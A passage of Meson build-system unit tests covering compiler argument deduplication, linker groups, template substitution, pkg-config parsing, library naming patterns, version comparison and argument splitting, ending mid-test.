cc = mesonbuild.compilers.ClangCCompiler([], 'fake', MachineChoice.HOST, False, mock.Mock())
# Test that empty initialization works
a = cc.compiler_args()
self.assertEqual(a, [])
# Test that list initialization works
a = cc.compiler_args(['-I.', '-I..'])
self.assertEqual(a, ['-I.', '-I..'])
# Test that there is no de-dup on initialization
self.assertEqual(cc.compiler_args(['-I.', '-I.']), ['-I.', '-I.'])
## Test that appending works
a.append('-I..')
self.assertEqual(a, ['-I..', '-I.'])
a.append('-O3')
self.assertEqual(a, ['-I..', '-I.', '-O3'])
## Test that in-place addition works
a += ['-O2', '-O2']
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2', '-O2'])
# Test that removal works
a.remove('-O2')
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2'])
# Test that de-dup happens on addition
a += ['-Ifoo', '-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# .extend() is just +=, so we don't test it
## Test that addition works
# Test that adding a list with just one old arg works and yields the same array
a = a + ['-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# Test that adding a list with one arg new and one old works
a = a + ['-Ifoo', '-Ibaz']
self.assertEqual(a, ['-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2'])
# Test that adding args that must be prepended and appended works
a = a + ['-Ibar', '-Wall']
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
## Test that reflected addition works
# Test that adding to a list with just one old arg works and yields the same array
a = ['-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
# Test that adding to a list with just one new arg that is not pre-pended works
a = ['-Werror'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with two new args preserves the order
a = ['-Ldir', '-Lbah'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with old args does nothing
a = ['-Ibar', '-Ibaz', '-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
## Test that adding libraries works
l = cc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Adding a library and a libpath appends both correctly
l += ['-Lbardir', '-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
# Adding the same library again does nothing
l += ['-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
## Test that 'direct' append and extend works
l = cc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
def test_compiler_args_class_gnuld(self):
## Test --start/end-group
linker = mesonbuild.linkers.GnuBFDDynamicLinker([], MachineChoice.HOST, '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = gcc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-Wl,--end-group'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '-Wl,--end-group'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding a non-library argument doesn't include it in the group
l += ['-Lfoo', '-Wl,--export-dynamic']
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group', '-Wl,--export-dynamic'])
# -Wl,-lfoo is detected as a library and gets added to the group
l.append('-Wl,-ldl')
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--export-dynamic', '-Wl,-ldl', '-Wl,--end-group'])
def test_compiler_args_remove_system(self):
## Test --start/end-group
linker = mesonbuild.linkers.GnuBFDDynamicLinker([], MachineChoice.HOST, '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = gcc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
## Test that to_native removes all system includes
l += ['-isystem/usr/include', '-isystem=/usr/share/include', '-DSOMETHING_IMPORTANT=1', '-isystem', '/usr/local/include']
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group', '-DSOMETHING_IMPORTANT=1'])
def test_string_templates_substitution(self):
dictfunc = mesonbuild.mesonlib.get_filenames_templates_dict
substfunc = mesonbuild.mesonlib.substitute_values
ME = mesonbuild.mesonlib.MesonException
# Identity
self.assertEqual(dictfunc([], []), {})
# One input, no outputs
inputs = ['bar/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + [d['@PLAINNAME@'] + '.ok'] + cmd[2:])
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
# One input, one output
inputs = ['bar/foo.c.in']
outputs = ['out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': '.'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', '@OUTPUT@', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + outputs + cmd[2:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', '@OUTPUT0@']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out', d['@PLAINNAME@'] + '.ok'] + outputs)
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
# One input, one output with a subdir
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Two inputs, no outputs
inputs = ['bar/foo.c.in', 'baz/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1]}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[1:])
cmd = ['@INPUT0@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
cmd = ['@INPUT0@', '@INPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Too many inputs
cmd = ['@PLAINNAME@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@BASENAME@']
self.assertRaises(ME, substfunc, cmd, d)
# No outputs
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTPUT0@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTDIR@']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, one output
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out'] + cmd[1:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, two outputs
outputs = ['dir/out.c', 'dir/out2.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTPUT1@': outputs[1],
'@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT0@', '@OUTPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[2:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', '@OUTDIR@']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok', 'dir'])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Many outputs, can't use @OUTPUT@ like this
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
def test_needs_exe_wrapper_override(self):
config = ConfigParser()
config['binaries'] = {
'c': '\'/usr/bin/gcc\'',
}
config['host_machine'] = {
'system': '\'linux\'',
'cpu_family': '\'arm\'',
'cpu': '\'armv7\'',
'endian': '\'little\'',
}
# Can not be used as context manager because we need to
# open it a second time and this is not possible on
# Windows.
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.flush()
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
detected_value = env.need_exe_wrapper()
os.unlink(configfilename)
desired_value = not detected_value
config['properties'] = {
'needs_exe_wrapper': 'true' if desired_value else 'false'
}
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
forced_value = env.need_exe_wrapper()
os.unlink(configfilename)
self.assertEqual(forced_value, desired_value)
def test_listify(self):
listify = mesonbuild.mesonlib.listify
# Test sanity
self.assertEqual([1], listify(1))
self.assertEqual([], listify([]))
self.assertEqual([1], listify([1]))
# Test flattening
self.assertEqual([1, 2, 3], listify([1, [2, 3]]))
self.assertEqual([1, 2, 3], listify([1, [2, [3]]]))
self.assertEqual([1, [2, [3]]], listify([1, [2, [3]]], flatten=False))
# Test flattening and unholdering
holder1 = ObjectHolder(1)
self.assertEqual([holder1], listify(holder1))
self.assertEqual([holder1], listify([holder1]))
self.assertEqual([holder1, 2], listify([holder1, 2]))
self.assertEqual([holder1, 2, 3], listify([holder1, 2, [3]]))
def test_unholder(self):
unholder = mesonbuild.mesonlib.unholder
holder1 = ObjectHolder(1)
holder3 = ObjectHolder(3)
holders = [holder1, holder3]
self.assertEqual(1, unholder(holder1))
self.assertEqual([1], unholder([holder1]))
self.assertEqual([1, 3], unholder(holders))
def test_extract_as_list(self):
extract = mesonbuild.mesonlib.extract_as_list
# Test sanity
kwargs = {'sources': [1, 2, 3]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
self.assertEqual(kwargs, {'sources': [1, 2, 3]})
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', pop=True))
self.assertEqual(kwargs, {})
# Test unholding
holder3 = ObjectHolder(3)
kwargs = {'sources': [1, 2, holder3]}
self.assertEqual(kwargs, {'sources': [1, 2, holder3]})
# flatten nested lists
kwargs = {'sources': [1, [2, [3]]]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
def test_pkgconfig_module(self):
dummystate = mock.Mock()
dummystate.subproject = 'dummy'
_mock = mock.Mock(spec=mesonbuild.dependencies.ExternalDependency)
_mock.pcdep = mock.Mock()
_mock.pcdep.name = "some_name"
_mock.version_reqs = []
_mock = mock.Mock(held_object=_mock)
# pkgconfig dependency as lib
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_libs([_mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
# pkgconfig dependency as requires
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_reqs([_mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
def _test_all_naming(self, cc, env, patterns, platform):
shr = patterns[platform]['shared']
stc = patterns[platform]['static']
shrstc = shr + tuple([x for x in stc if x not in shr])
stcshr = stc + tuple([x for x in shr if x not in stc])
p = cc.get_library_naming(env, LibType.SHARED)
self.assertEqual(p, shr)
p = cc.get_library_naming(env, LibType.STATIC)
self.assertEqual(p, stc)
p = cc.get_library_naming(env, LibType.PREFER_STATIC)
self.assertEqual(p, stcshr)
p = cc.get_library_naming(env, LibType.PREFER_SHARED)
self.assertEqual(p, shrstc)
# Test find library by mocking up openbsd
if platform != 'openbsd':
return
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'libfoo.so.6.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.5.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.54.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.66a.0b'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.70.0.so.1'), 'w') as f:
f.write('')
found = cc._find_library_real('foo', env, [tmpdir], '', LibType.PREFER_SHARED)
self.assertEqual(os.path.basename(found[0]), 'libfoo.so.54.0')
def test_find_library_patterns(self):
'''
Unit test for the library search patterns used by find_library()
'''
unix_static = ('lib{}.a', '{}.a')
msvc_static = ('lib{}.a', 'lib{}.lib', '{}.a', '{}.lib')
# This is the priority list of pattern matching for library searching
patterns = {'openbsd': {'shared': ('lib{}.so', '{}.so', 'lib{}.so.[0-9]*.[0-9]*', '{}.so.[0-9]*.[0-9]*'),
'static': unix_static},
'linux': {'shared': ('lib{}.so', '{}.so'),
'static': unix_static},
'darwin': {'shared': ('lib{}.dylib', 'lib{}.so', '{}.dylib', '{}.so'),
'static': unix_static},
'cygwin': {'shared': ('cyg{}.dll', 'cyg{}.dll.a', 'lib{}.dll',
'lib{}.dll.a', '{}.dll', '{}.dll.a'),
'static': ('cyg{}.a',) + unix_static},
'windows-msvc': {'shared': ('lib{}.lib', '{}.lib'),
'static': msvc_static},
'windows-mingw': {'shared': ('lib{}.dll.a', 'lib{}.lib', 'lib{}.dll',
'{}.dll.a', '{}.lib', '{}.dll'),
'static': msvc_static}}
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if is_osx():
self._test_all_naming(cc, env, patterns, 'darwin')
elif is_cygwin():
self._test_all_naming(cc, env, patterns, 'cygwin')
elif is_windows():
if cc.get_argument_syntax() == 'msvc':
self._test_all_naming(cc, env, patterns, 'windows-msvc')
else:
self._test_all_naming(cc, env, patterns, 'windows-mingw')
elif is_openbsd():
self._test_all_naming(cc, env, patterns, 'openbsd')
else:
self._test_all_naming(cc, env, patterns, 'linux')
env.machines.host.system = 'openbsd'
self._test_all_naming(cc, env, patterns, 'openbsd')
env.machines.host.system = 'darwin'
self._test_all_naming(cc, env, patterns, 'darwin')
env.machines.host.system = 'cygwin'
self._test_all_naming(cc, env, patterns, 'cygwin')
env.machines.host.system = 'windows'
self._test_all_naming(cc, env, patterns, 'windows-mingw')
@skipIfNoPkgconfig
def test_pkgconfig_parse_libs(self):
'''
Unit test for parsing of pkg-config output to search for libraries
https://github.com/mesonbuild/meson/issues/3951
'''
def create_static_lib(name):
if not is_osx():
name.open('w').close()
return
src = name.with_suffix('.c')
out = name.with_suffix('.o')
with src.open('w') as f:
f.write('int meson_foobar (void) { return 0; }')
subprocess.check_call(['clang', '-c', str(src), '-o', str(out)])
subprocess.check_call(['ar', 'csr', str(name), str(out)])
with tempfile.TemporaryDirectory() as tmpdir:
pkgbin = ExternalProgram('pkg-config', command=['pkg-config'], silent=True)
env = get_fake_env()
compiler = env.detect_c_compiler(MachineChoice.HOST)
env.coredata.compilers.host = {'c': compiler}
env.coredata.options[OptionKey('link_args', lang='c')] = FakeCompilerOptions()
p1 = Path(tmpdir) / '1'
p2 = Path(tmpdir) / '2'
p1.mkdir()
p2.mkdir()
# libfoo.a is in one prefix
create_static_lib(p1 / 'libfoo.a')
# libbar.a is in both prefixes
create_static_lib(p1 / 'libbar.a')
create_static_lib(p2 / 'libbar.a')
# Ensure that we never statically link to these
create_static_lib(p1 / 'libpthread.a')
create_static_lib(p1 / 'libm.a')
create_static_lib(p1 / 'libc.a')
create_static_lib(p1 / 'libdl.a')
create_static_lib(p1 / 'librt.a')
def fake_call_pkgbin(self, args, env=None):
if '--libs' not in args:
return 0, '', ''
if args[-1] == 'foo':
return 0, f'-L{p2.as_posix()} -lfoo -L{p1.as_posix()} -lbar', ''
if args[-1] == 'bar':
return 0, f'-L{p2.as_posix()} -lbar', ''
if args[-1] == 'internal':
return 0, f'-L{p1.as_posix()} -lpthread -lm -lc -lrt -ldl', ''
old_call = PkgConfigDependency._call_pkgbin
old_check = PkgConfigDependency.check_pkgconfig
PkgConfigDependency._call_pkgbin = fake_call_pkgbin
PkgConfigDependency.check_pkgconfig = lambda x, _: pkgbin
# Test begins
try:
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('foo', env, kwargs)
self.assertEqual(foo_dep.get_link_args(),
[(p1 / 'libfoo.a').as_posix(), (p2 / 'libbar.a').as_posix()])
bar_dep = PkgConfigDependency('bar', env, kwargs)
self.assertEqual(bar_dep.get_link_args(), [(p2 / 'libbar.a').as_posix()])
internal_dep = PkgConfigDependency('internal', env, kwargs)
if compiler.get_argument_syntax() == 'msvc':
self.assertEqual(internal_dep.get_link_args(), [])
else:
link_args = internal_dep.get_link_args()
for link_arg in link_args:
for lib in ('pthread', 'm', 'c', 'dl', 'rt'):
self.assertNotIn(f'lib{lib}.a', link_arg, msg=link_args)
finally:
# Test ends
PkgConfigDependency._call_pkgbin = old_call
PkgConfigDependency.check_pkgconfig = old_check
# Reset dependency class to ensure that in-process configure doesn't mess up
PkgConfigDependency.pkgbin_cache = {}
PkgConfigDependency.class_pkgbin = PerMachine(None, None)
def test_version_compare(self):
comparefunc = mesonbuild.mesonlib.version_compare_many
for (a, b, result) in [
('0.99.beta19', '>= 0.99.beta14', True),
]:
self.assertEqual(comparefunc(a, b)[0], result)
for (a, b, op) in [
# examples from https://fedoraproject.org/wiki/Archive:Tools/RPM/VersionComparison
("1.0010", "1.9", operator.gt),
("1.05", "1.5", operator.eq),
("1.0", "1", operator.gt),
("2.50", "2.5", operator.gt),
("fc4", "fc.4", operator.eq),
("FC5", "fc4", operator.lt),
("2a", "2.0", operator.lt),
("1.0", "1.fc4", operator.gt),
("3.0.0_fc", "3.0.0.fc", operator.eq),
# from RPM tests
("1.0", "1.0", operator.eq),
("1.0", "2.0", operator.lt),
("2.0", "1.0", operator.gt),
("2.0.1", "2.0.1", operator.eq),
("2.0", "2.0.1", operator.lt),
("2.0.1", "2.0", operator.gt),
("2.0.1a", "2.0.1a", operator.eq),
("2.0.1a", "2.0.1", operator.gt),
("2.0.1", "2.0.1a", operator.lt),
("5.5p1", "5.5p1", operator.eq),
("5.5p1", "5.5p2", operator.lt),
("5.5p2", "5.5p1", operator.gt),
("5.5p10", "5.5p10", operator.eq),
("5.5p1", "5.5p10", operator.lt),
("5.5p10", "5.5p1", operator.gt),
("10xyz", "10.1xyz", operator.lt),
("10.1xyz", "10xyz", operator.gt),
("xyz10", "xyz10", operator.eq),
("xyz10", "xyz10.1", operator.lt),
("xyz10.1", "xyz10", operator.gt),
("xyz.4", "xyz.4", operator.eq),
("xyz.4", "8", operator.lt),
("8", "xyz.4", operator.gt),
("xyz.4", "2", operator.lt),
("2", "xyz.4", operator.gt),
("5.5p2", "5.6p1", operator.lt),
("5.6p1", "5.5p2", operator.gt),
("5.6p1", "6.5p1", operator.lt),
("6.5p1", "5.6p1", operator.gt),
("6.0.rc1", "6.0", operator.gt),
("6.0", "6.0.rc1", operator.lt),
("10b2", "10a1", operator.gt),
("10a2", "10b2", operator.lt),
("1.0aa", "1.0aa", operator.eq),
("1.0a", "1.0aa", operator.lt),
("1.0aa", "1.0a", operator.gt),
("10.0001", "10.0001", operator.eq),
("10.0001", "10.1", operator.eq),
("10.1", "10.0001", operator.eq),
("10.0001", "10.0039", operator.lt),
("10.0039", "10.0001", operator.gt),
("4.999.9", "5.0", operator.lt),
("5.0", "4.999.9", operator.gt),
("20101121", "20101121", operator.eq),
("20101121", "20101122", operator.lt),
("20101122", "20101121", operator.gt),
("2_0", "2_0", operator.eq),
("2.0", "2_0", operator.eq),
("2_0", "2.0", operator.eq),
("a", "a", operator.eq),
("a+", "a+", operator.eq),
("a+", "a_", operator.eq),
("a_", "a+", operator.eq),
("+a", "+a", operator.eq),
("+a", "_a", operator.eq),
("_a", "+a", operator.eq),
("+_", "+_", operator.eq),
("_+", "+_", operator.eq),
("_+", "_+", operator.eq),
("+", "_", operator.eq),
("_", "+", operator.eq),
# other tests
('0.99.beta19', '0.99.beta14', operator.gt),
("1.0.0", "2.0.0", operator.lt),
(".0.0", "2.0.0", operator.lt),
("alpha", "beta", operator.lt),
("1.0", "1.0.0", operator.lt),
("2.456", "2.1000", operator.lt),
("2.1000", "3.111", operator.lt),
("2.001", "2.1", operator.eq),
("2.34", "2.34", operator.eq),
("6.1.2", "6.3.8", operator.lt),
("1.7.3.0", "2.0.0", operator.lt),
("2.24.51", "2.25", operator.lt),
("2.1.5+20120813+gitdcbe778", "2.1.5", operator.gt),
("3.4.1", "3.4b1", operator.gt),
("041206", "200090325", operator.lt),
("0.6.2+git20130413", "0.6.2", operator.gt),
("2.6.0+bzr6602", "2.6.0", operator.gt),
("2.6.0", "2.6b2", operator.gt),
("2.6.0+bzr6602", "2.6b2x", operator.gt),
("0.6.7+20150214+git3a710f9", "0.6.7", operator.gt),
("15.8b", "15.8.0.1", operator.lt),
("1.2rc1", "1.2.0", operator.lt),
]:
ver_a = Version(a)
ver_b = Version(b)
if op is operator.eq:
for o, name in [(op, 'eq'), (operator.ge, 'ge'), (operator.le, 'le')]:
self.assertTrue(o(ver_a, ver_b), f'{ver_a} {name} {ver_b}')
if op is operator.lt:
for o, name in [(op, 'lt'), (operator.le, 'le'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), f'{ver_a} {name} {ver_b}')
for o, name in [(operator.gt, 'gt'), (operator.ge, 'ge'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), f'{ver_a} {name} {ver_b}')
if op is operator.gt:
for o, name in [(op, 'gt'), (operator.ge, 'ge'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), f'{ver_a} {name} {ver_b}')
for o, name in [(operator.lt, 'lt'), (operator.le, 'le'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), f'{ver_a} {name} {ver_b}')
def test_msvc_toolset_version(self):
'''
Ensure that the toolset version returns the correct value for this MSVC
'''
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
toolset_ver = cc.get_toolset_version()
self.assertIsNotNone(toolset_ver)
# Visual Studio 2015 and older versions do not define VCToolsVersion
# TODO: ICL doesn't set this in the VSC2015 profile either
if cc.id == 'msvc' and int(''.join(cc.version.split('.')[0:2])) < 1910:
return
if 'VCToolsVersion' in os.environ:
vctools_ver = os.environ['VCToolsVersion']
else:
self.assertIn('VCINSTALLDIR', os.environ)
# See https://devblogs.microsoft.com/cppblog/finding-the-visual-c-compiler-tools-in-visual-studio-2017/
vctools_ver = (Path(os.environ['VCINSTALLDIR']) / 'Auxiliary' / 'Build' / 'Microsoft.VCToolsVersion.default.txt').read_text()
self.assertTrue(vctools_ver.startswith(toolset_ver),
msg=f'{vctools_ver!r} does not start with {toolset_ver!r}')
def test_split_args(self):
split_args = mesonbuild.mesonlib.split_args
join_args = mesonbuild.mesonlib.join_args
if is_windows():
test_data = [
# examples from https://docs.microsoft.com/en-us/cpp/c-language/parsing-c-command-line-arguments
(r'"a b c" d e', ['a b c', 'd', 'e'], True),
(r'"ab\"c" "\\" d', ['ab"c', '\\', 'd'], False),
(r'a\\\b d"e f"g h', [r'a\\\b', 'de fg', 'h'], False),
(r'a\\\"b c d', [r'a\"b', 'c', 'd'], False),
(r'a\\\\"b c" d e', [r'a\\b c', 'd', 'e'], False),
# other basics
(r'""', [''], True),
(r'a b c d "" e', ['a', 'b', 'c', 'd', '', 'e'], True),
(r"'a b c' d e", ["'a", 'b', "c'", 'd', 'e'], True),
(r"'a&b&c' d e", ["'a&b&c'", 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], True),
(r"'a & b & c d e'", ["'a", '&', 'b', '&', 'c', 'd', "e'"], True),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
# more illustrative tests
(r'cl test.cpp /O1 /Fe:test.exe', ['cl', 'test.cpp', '/O1', '/Fe:test.exe'], True),
